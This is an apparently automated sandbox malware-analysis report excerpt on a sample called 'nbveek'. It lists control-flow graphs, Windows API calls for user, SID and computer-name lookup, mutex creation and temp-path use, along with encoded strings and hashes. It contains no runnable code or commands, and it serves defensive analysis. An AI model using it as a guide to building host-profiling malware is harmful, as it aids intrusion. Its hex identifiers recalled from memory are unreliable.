                                                                                                                                                                                      • GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 01182B30
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01182CA6
                                                                                                                                                                                        • Part of subcall function 01185760: Concurrency::cancel_current_task.LIBCPMT ref: 01185819
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Name$ModuleUserVersion$AddressAdminCloseComputerConcurrency::cancel_current_taskFileHandleOpenProcQueryValue
                                                                                                                                                                                      • String ID: .$853321935212$Jh3ETN==$Jh3sTN==$JhDuTN==$JhLyTN==$Jhr7TN==$Jhz7TN==$JhzDTN==$JiHpTN==$JiPzTN==$JiTETN==$JivoTN==$MtY7Qt==$aRKd$b54ad7
                                                                                                                                                                                      • API String ID: 2274579697-753810990
                                                                                                                                                                                      • Opcode ID: c3ca3c5fd85a91053fac504593ce39bce3e3d53ed956d68fb91dcea502df5202
                                                                                                                                                                                      • Instruction ID: 98c1f6a6dd76cfe5f870ad82ea3fd4272ed9c6d25802901f83adfed406db8b69
                                                                                                                                                                                      • Opcode Fuzzy Hash: c3ca3c5fd85a91053fac504593ce39bce3e3d53ed956d68fb91dcea502df5202
                                                                                                                                                                                      • Instruction Fuzzy Hash: CBC22770A101588BEB2DEB38CC9979DBA72AB92308F54C2D8D408A73D5DB359FC58F51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1160 1172fe0-117305f GetUserNameW GetProcessHeap HeapAlloc GetUserNameW 1161 1173065-11730a7 LookupAccountNameW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 1160->1161 1162 11731d2-11731f5 GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap HeapFree LocalFree 1160->1162 1161->1162 1164 11730ad-11730af 1161->1164 1163 11731fb-1173216 call 1186cc2 1162->1163 1164->1162 1166 11730b5-11730ce LookupAccountNameW 1164->1166 1166->1162 1168 11730d4-11730e1 ConvertSidToStringSidW 1166->1168 1168->1162 1169 11730e7-11730ef 1168->1169 1170 11730f0-11730f9 1169->1170 1170->1170 1171 11730fb-1173114 call 1187343 1170->1171 1174 1173116-117311c 1171->1174 1175 1173138-117314f 1171->1175 1176 1173120-1173130 1174->1176 1177 1173150-1173155 1175->1177 1176->1176 1178 1173132 1176->1178 1177->1177 1179 1173157-11731a4 call 1185ac0 * 2 1177->1179 1178->1175 1180 1173134-1173136 1178->1180 1185 11731a6-11731b2 1179->1185 1186 11731ce-11731d0 1179->1186 1180->1175 1180->1176 1187 11731c4-11731cb call 1187335 1185->1187 1188 11731b4-11731c2 1185->1188 1186->1163 1187->1186 1188->1187 1189 1173217-117321f call 118b98e 1188->1189
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 01173032
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000001), ref: 01173047
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000001), ref: 0117304A
                                                                                                                                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 01173058
                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0117307B
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000001), ref: 01173086
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000001), ref: 01173089
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000001), ref: 01173099
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000001), ref: 0117309C
                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 011730C6
                                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 011730D9
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,00000001), ref: 011731D5
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000001), ref: 011731DE
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 011731E3
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000001), ref: 011731E6
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 011731ED
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000001), ref: 011731F0
                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,00000001), ref: 011731F5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3326663573-0
                                                                                                                                                                                      • Opcode ID: 98c90f599885cdfdc67f2fe08248bd8c927256c74295d131ecee0639448ac6fe
                                                                                                                                                                                      • Instruction ID: 26a9d6604fdb56dcbcc36bd886b7f8f62178a49f61adac9dc6279e2272188297
                                                                                                                                                                                      • Opcode Fuzzy Hash: 98c90f599885cdfdc67f2fe08248bd8c927256c74295d131ecee0639448ac6fe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 437173B1E10209AFDB29DFA4DC85BAFBBB9FF45300F044529E925A7240DB349945CF61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1194 1177df0-1177e04 1195 1177e06-1177e21 1194->1195 1196 1177e23-1177e2f call 11865c0 1194->1196 1197 1177e34-1177e3b 1195->1197 1196->1197 1199 1177e42-1177f09 CreateMutexW GetLastError call 118a74f call 118b98e 1197->1199 1200 1177e3d-1177e40 1197->1200 1200->1194 1200->1199
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateMutexW.KERNELBASE(00000000,00000000,?,011A918C,A875633B,?,00000000,00000000), ref: 01177E51
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 01177E57
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateErrorLastMutex
                                                                                                                                                                                      • String ID: JdSlVU g4rI=
                                                                                                                                                                                      • API String ID: 1925916568-906873360
                                                                                                                                                                                      • Opcode ID: 8f21128744007dea065bf011d6f5dc05b7f824f4b7ae1a12ad1027698157a5c1
                                                                                                                                                                                      • Instruction ID: 15f140a78aca7a7f48839f648d16caa6fc5b968c2b2bfbaaf330179c59b6e8c9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f21128744007dea065bf011d6f5dc05b7f824f4b7ae1a12ad1027698157a5c1
                                                                                                                                                                                      • Instruction Fuzzy Hash: B1223771A001089BEB1CEB78CD89B9DBB76EF45314F64852CE915A73C4EB35AA80CF51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1206 1186cfa-1186d1b InitializeCriticalSectionAndSpinCount GetModuleHandleW 1207 1186d1d-1186d2c GetModuleHandleW 1206->1207 1208 1186d2e-1186d4a GetProcAddress * 2 1206->1208 1207->1208 1209 1186d74-1186d8e call 11875c0 DeleteCriticalSection 1207->1209 1210 1186d4c-1186d4e 1208->1210 1211 1186d5e-1186d72 CreateEventW 1208->1211 1216 1186d90-1186d91 CloseHandle 1209->1216 1217 1186d97 1209->1217 1210->1211 1212 1186d50-1186d56 1210->1212 1211->1209 1213 1186d5b-1186d5d 1211->1213 1212->1213 1216->1217
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(011A9708,00000FA0,?,?,01186CD8), ref: 01186D06
                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01186CD8), ref: 01186D11
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01186CD8), ref: 01186D22
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01186D34
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01186D42
                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01186CD8), ref: 01186D65
                                                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 01186D76
                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(011A9708,00000007,?,?,01186CD8), ref: 01186D81
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,01186CD8), ref: 01186D91
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 01186D0C
                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 01186D2E
                                                                                                                                                                                      • kernel32.dll, xrefs: 01186D1D
                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 01186D3A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                                                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                      • API String ID: 3578986977-3242537097
                                                                                                                                                                                      • Opcode ID: 2a1932803e7d84fb7a60b36f0d45ababf7b7ed92a840c1ab635459762d87b281
                                                                                                                                                                                      • Instruction ID: d7c2b3441804e16ae3de3727d5b786fe8e34b78ca94f2821d1c4d9b90726255c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a1932803e7d84fb7a60b36f0d45ababf7b7ed92a840c1ab635459762d87b281
                                                                                                                                                                                      • Instruction Fuzzy Hash: A60180B4642611ABEB3DAEA9E809A9A3E98AB44A50B044134FA34D2108FB60C4C08F71
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1218 1181050-11810b2 call 1185ac0 1221 11810b8-1181107 call 1185ac0 1218->1221 1222 1182060 call 1185c00 1218->1222 1221->1222 1227 118110d-1181157 call 1185ac0 1221->1227 1226 1182065 call 1185c00 1222->1226 1230 118206a call 118b98e 1226->1230 1227->1222 1233 118115d-11811ab call 1185ac0 call 1185760 call 1172be0 1227->1233 1234 118206f call 118b98e 1230->1234 1247 11811ad 1233->1247 1248 11811af-11811ef call 1186220 1233->1248 1237 1182074 call 1185c00 1234->1237 1242 1182079 call 118b98e 1237->1242 1246 118207e-1182083 call 1186c62 1242->1246 1251 1182088 call 118b98e 1246->1251 1247->1248 1248->1226 1254 11811f5-1181226 call 1185ac0 1248->1254 1255 118208d 1251->1255 1261 1181228-1181237 1254->1261 1262 1181257-118127f call 1176d20 1254->1262 1257 1182097 call 118b98e 1255->1257 1258 1182092 call 1186ca2 1255->1258 1258->1257 1264 1181239-1181247 1261->1264 1265 118124d-1181254 call 1187335 1261->1265 1268 118162c-1181635 1262->1268 1269 1181285-118130e call 1185760 call 1172be0 call 1185ac0 call 11860e0 1262->1269 1264->1230 1264->1265 1265->1262 1272 1181666-118166f 1268->1272 1273 1181637-1181646 1268->1273 1315 118133f-118134c 1269->1315 1316 1181310-118131f 1269->1316 1277 11816a0-11816a9 1272->1277 1278 1181671-1181680 1272->1278 1274 1181648-1181656 1273->1274 1275 118165c-1181663 call 1187335 1273->1275 1274->1251 1274->1275 1275->1272 1283 11816da-11816fe 1277->1283 1284 11816ab-11816ba 1277->1284 1281 1181682-1181690 1278->1281 1282 1181696-118169d call 1187335 1278->1282 1281->1251 1281->1282 1282->1277 1285 118172f-1181738 1283->1285 1286 1181700-118170f 1283->1286 1290 11816bc-11816ca 1284->1290 1291 11816d0-11816d7 call 1187335 1284->1291 1294 1181f88-118201a 1285->1294 1295 118173e-118174d 1285->1295 1292 1181711-118171f 1286->1292 1293 1181725-118172c call 1187335 1286->1293 1290->1251 1290->1291 1291->1283 1292->1251 1292->1293 1293->1285 1312 118201c-1182028 1294->1312 1313 1182044-118205f call 1186cc2 1294->1313 1300 1181f7e-1181f85 call 1187335 1295->1300 1301 1181753-1181761 1295->1301 1300->1294 1301->1251 1307 1181767 1301->1307 1307->1300 1317 118203a-1182041 call 1187335 1312->1317 1318 118202a-1182038 1312->1318 1319 118137d-118137f 1315->1319 1320 118134e-118135d 1315->1320 1322 1181321-118132f 1316->1322 1323 1181335-118133c call 1187335 1316->1323 1317->1313 1318->1257 1318->1317 1327 11814b9-11814f2 call 118b4a2 call 118b76a 1319->1327 1328 1181385-11813c2 call 1185760 1319->1328 1325 118135f-118136d 1320->1325 1326 1181373-118137a call 1187335 1320->1326 1322->1234 1322->1323 1323->1315 1325->1234 1325->1326 1326->1319 1327->1246 1342 11814f8-11814fb 1327->1342 1328->1237 1339 11813c8-118142f call 1185ac0 call 11726d0 call 1172540 call 11856a0 1328->1339 1365 1181460-1181488 1339->1365 1366 1181431-1181440 1339->1366 1342->1255 1344 1181501-1181504 1342->1344 1344->1268 1346 118150a 1344->1346 1348 118176c-118186c call 1185ac0 * 2 call 1185760 call 1172be0 call 1185760 * 5 call 117f5e0 1346->1348 1349 1181511-118160b call 1185ac0 * 2 call 1185760 call 1172be0 call 1185760 * 5 1346->1349 1350 1181871-118196f call 1185ac0 * 2 call 1185760 call 1172be0 call 1185760 * 5 1346->1350 1348->1268 1420 118160f-1181621 call 1185760 call 117e580 1349->1420 1350->1420 1365->1327 1372 118148a-1181499 1365->1372 1370 1181442-1181450 1366->1370 1371 1181456-118145d call 1187335 1366->1371 1370->1242 1370->1371 1371->1365 1378 118149b-11814a9 1372->1378 1379 11814af-11814b6 call 1187335 1372->1379 1378->1242 1378->1379 1379->1327 1426 1181626 1420->1426 1426->1268
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 01182083
                                                                                                                                                                                        • Part of subcall function 01185AC0: Concurrency::cancel_current_task.LIBCPMT ref: 01185BF3
                                                                                                                                                                                        • Part of subcall function 01185760: Concurrency::cancel_current_task.LIBCPMT ref: 01185819
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task$Xinvalid_argumentstd::_
                                                                                                                                                                                      • String ID: $$5120$Ir==$Ktmw$YXVp$ZBrx$ZSbq$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                      • API String ID: 2406272785-3808492975
                                                                                                                                                                                      • Opcode ID: 5cae7cde47be165938d5550fd76d84e282e0f243c37a91a795ee68d8de03de0f
                                                                                                                                                                                      • Instruction ID: 7d5b380c46f26e694c63421eb19570da88319b23db4ce0385d5a41315b4335cd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cae7cde47be165938d5550fd76d84e282e0f243c37a91a795ee68d8de03de0f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F42E371A002189BEB1CFB38CD957DDBFB6AB56308F9481C8D40967281D7758A85CF92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1427 1192361-1192391 call 11920af 1430 11923ac-11923b8 call 118ec2d 1427->1430 1431 1192393-119239e call 118b48f 1427->1431 1437 11923ba-11923cf call 118b48f call 118b4a2 1430->1437 1438 11923d1-119241a call 119201a 1430->1438 1436 11923a0-11923a7 call 118b4a2 1431->1436 1445 1192686-119268a 1436->1445 1437->1436 1447 119241c-1192425 1438->1447 1448 1192487-1192490 GetFileType 1438->1448 1452 119245c-1192482 GetLastError call 118b46c 1447->1452 1453 1192427-119242b 1447->1453 1449 11924d9-11924dc 1448->1449 1450 1192492-11924c3 GetLastError call 118b46c CloseHandle 1448->1450 1457 11924de-11924e3 1449->1457 1458 11924e5-11924eb 1449->1458 1450->1436 1466 11924c9-11924d4 call 118b4a2 1450->1466 1452->1436 1453->1452 1454 119242d-119245a call 119201a 1453->1454 1454->1448 1454->1452 1460 11924ef-119253d call 118eb78 1457->1460 1459 11924ed 1458->1459 1458->1460 1459->1460 1469 119255c-1192584 call 1191dc7 1460->1469 1470 119253f-119254b call 1192229 1460->1470 1466->1436 1477 1192589-11925ca 1469->1477 1478 1192586-1192587 1469->1478 1470->1469 1476 119254d 1470->1476 1481 119254f-1192557 call 118d454 1476->1481 1479 11925eb-11925f9 1477->1479 1480 11925cc-11925d0 1477->1480 1478->1481 1483 11925ff-1192603 1479->1483 1484 1192684 1479->1484 1480->1479 1482 11925d2-11925e6 1480->1482 1481->1445 1482->1479 1483->1484 1486 1192605-1192638 CloseHandle call 119201a 1483->1486 1484->1445 1490 119263a-1192666 GetLastError call 118b46c call 118ed40 1486->1490 1491 119266c-1192680 1486->1491 1490->1491 1491->1484
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0119201A: CreateFileW.KERNELBASE(00000000,00000000,?,0119240A,?,?,00000000,?,0119240A,00000000,0000000C), ref: 01192037
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 01192475
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0119247C
                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 01192488
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 01192492
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0119249B
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 011924BB
                                                                                                                                                                                      • CloseHandle.KERNEL32(0118D19E), ref: 01192608
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0119263A
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 01192641
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                      • Opcode ID: f2db329941588486bdd85614156e01ff53895c8f78fb4a1888d4ce1d7e551ba5
                                                                                                                                                                                      • Instruction ID: c3e97f609508fd03174557ac388ee4bd07aa53da3a91c624f0e9ea4bc6c2c44d
                                                                                                                                                                                      • Opcode Fuzzy Hash: f2db329941588486bdd85614156e01ff53895c8f78fb4a1888d4ce1d7e551ba5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 64A16932A04155AFDF1DEF6CD851BAD3BB1AB06324F184159E822EF392CB319942CB52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1496 117e580-117e604 call 118b4a2 call 118b76a 1501 117ef05-117ef0a call 1186c62 1496->1501 1502 117e60a-117e60d 1496->1502 1508 117ef0f call 118b98e 1501->1508 1503 117e613-117e616 1502->1503 1504 117ef1e-117ef23 call 1186ca2 1502->1504 1506 117e830-117e886 call 1185760 * 2 call 1178aa0 call 118a81c 1503->1506 1507 117e61c 1503->1507 1521 117eb7c-117ebe3 call 1185760 call 1172be0 call 1185760 * 3 1506->1521 1522 117e88c-117e8e0 call 118a8aa call 1185760 call 118b41e 1506->1522 1507->1506 1513 117ef14-117ef19 call 1186c62 1508->1513 1513->1504 1548 117ebe7-117ebf9 call 1185760 call 117c950 1521->1548 1535 117e8e2-117e8f1 1522->1535 1536 117e911-117e965 call 118b4a2 call 118b76a 1522->1536 1538 117e907-117e90e call 1187335 1535->1538 1539 117e8f3-117e901 1535->1539 1536->1513 1550 117e96b-117e96e 1536->1550 1538->1536 1539->1508 1539->1538 1557 117ebfe 1548->1557 1550->1504 1552 117e974-117e976 1550->1552 1552->1521 1554 117e97c-117e9e7 call 1185ac0 call 1185760 * 2 call 1173c70 1552->1554 1600 117eb14-117eb7a call 1185760 call 1172be0 call 1185760 * 3 1554->1600 1601 117e9ed-117ea65 call 1185760 call 1172be0 call 1185760 * 4 call 117c950 1554->1601 1559 117ec01-117ec0a 1557->1559 1561 117ec0c-117ec1b 1559->1561 1562 117ec3b-117ec5c 1559->1562 1564 117ec31-117ec38 call 1187335 1561->1564 1565 117ec1d-117ec2b 1561->1565 1566 117ec5e-117ec6a 1562->1566 1567 117ec8a-117eca2 1562->1567 1564->1562 1565->1508 1565->1564 1572 117ec80-117ec87 call 1187335 1566->1572 1573 117ec6c-117ec7a 1566->1573 1568 117eca4-117ecb0 1567->1568 1569 117ecd0-117ece8 1567->1569 1575 117ecc6-117eccd call 1187335 1568->1575 1576 117ecb2-117ecc0 1568->1576 1578 117ed16-117ed2e 1569->1578 1579 117ecea-117ecf6 1569->1579 1572->1567 1573->1508 1573->1572 1575->1569 1576->1508 1576->1575 1586 117ed30-117ed3c 1578->1586 1587 117ed5c-117ed74 1578->1587 1584 117ed0c-117ed13 call 1187335 1579->1584 1585 117ecf8-117ed06 1579->1585 1584->1578 1585->1508 1585->1584 1588 117ed52-117ed59 call 1187335 1586->1588 1589 117ed3e-117ed4c 1586->1589 1590 117ed76-117ed82 1587->1590 1591 117eda2-117edbd 1587->1591 1588->1587 1589->1508 1589->1588 1596 117ed84-117ed92 1590->1596 1597 117ed98-117ed9f call 1187335 1590->1597 1598 117edbf-117edce 1591->1598 1599 117edee-117ee12 1591->1599 1596->1508 1596->1597 1597->1591 1607 117ede4-117edeb call 1187335 1598->1607 1608 117edd0-117edde 1598->1608 1603 117ee14-117ee23 1599->1603 1604 117ee43-117ee67 1599->1604 1600->1548 1653 117ea6a-117ea88 1601->1653 1611 117ee25-117ee33 1603->1611 1612 117ee39-117ee40 call 1187335 1603->1612 1613 117ee69-117ee78 1604->1613 1614 117ee98-117eebc 1604->1614 1607->1599 1608->1508 1608->1607 1611->1508 1611->1612 1612->1604 1620 117ee8e-117ee95 call 1187335 1613->1620 1621 117ee7a-117ee88 1613->1621 1622 117eebe-117eecd 1614->1622 1623 117eee9-117ef04 call 1186cc2 1614->1623 1620->1614 1621->1508 1621->1620 1630 117eedf-117eee6 call 1187335 1622->1630 1631 117eecf-117eedd 1622->1631 1630->1623 1631->1508 1631->1630 1653->1559 1654 117ea8e-117ea93 1653->1654 1655 117ea95-117ea97 1654->1655 1656 117ea99-117ea9b 1654->1656 1657 117ea9e-117eaa0 1655->1657 1656->1657 1657->1559 1658 117eaa6-117eb0f call 1185760 * 2 call 11751e0 call 1185760 call 1172be0 call 1172ea0 1657->1658 1658->1559
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0117E735
                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0117EF0A
                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0117EF19
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Xinvalid_argumentstd::_$PathTemp
                                                                                                                                                                                      • String ID: &$853321935212$ZOu=$ZOy=$Zyy=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                      • API String ID: 3683522868-40229855
